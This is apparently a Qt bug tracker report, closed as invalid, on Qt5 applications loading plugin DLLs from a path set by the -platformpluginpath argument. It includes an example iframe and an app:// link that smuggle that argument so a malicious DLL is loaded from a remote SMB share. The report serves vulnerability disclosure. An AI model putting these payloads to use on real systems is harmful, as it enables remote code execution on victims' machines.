Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Invalid
Priority: P2: Important
Fix Version/s: None
Affects Version/s: 5.11
Component/s: Core: Plugins
Labels:
- Reported_via_standard_support
Environment:
Windows

Platform/s:

Windows

Description

The Qt5 application, depending on certain metadata, will automatically execute those plugins pointed by platformpluginpath as soon as they are loaded in memory.

For example,

myTest.exe -platformpluginpath C:/Path-of-library/specific

will load and execute all DLLs in the C:/Path-of-library/specific/imageformats directory.

 <iframe src='myTest;?" - platformpluginpath \\192.162.x.y\share "'>

Now this remote “share” contains an “imageformats” directory that holds a “malicious.dll” file. Now since Qt Load plugins based on the metadata so dll name does not matter.

Another scenario:

if a user register custom URL scheme for one application in Windows, e.g.

app://. User has this application installed and URL scheme registered.

Create webpage with link to 'app://? "-platformpluginpath

\\SERVER\SharedFolder\"'.

When user opens such page on his PC and clicks this link your application is

started on bis machine and platform plugin is loaded from shared folder. This

platform plugin can be qwindows.dll with injected code.

There two nicely detailed article here about this potential dangerous situation:

https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-

cve-2019-1636-and-cve-2019-6739

https://www.bleepingcomputer.com/news/security/qt5-based-gui-apps-susceptible-

to-remote-code-execution/

Attachments

Activity

People

Assignee:: Thiago Macieira

Reporter:: Irfan Omair

Votes:: 0 Vote for this issue

Watchers:: 4 Start watching this issue

Dates

Created:: 16 May '19 22:50

Updated:: 17 May '19 07:39

Resolved:: 17 May '19 07:39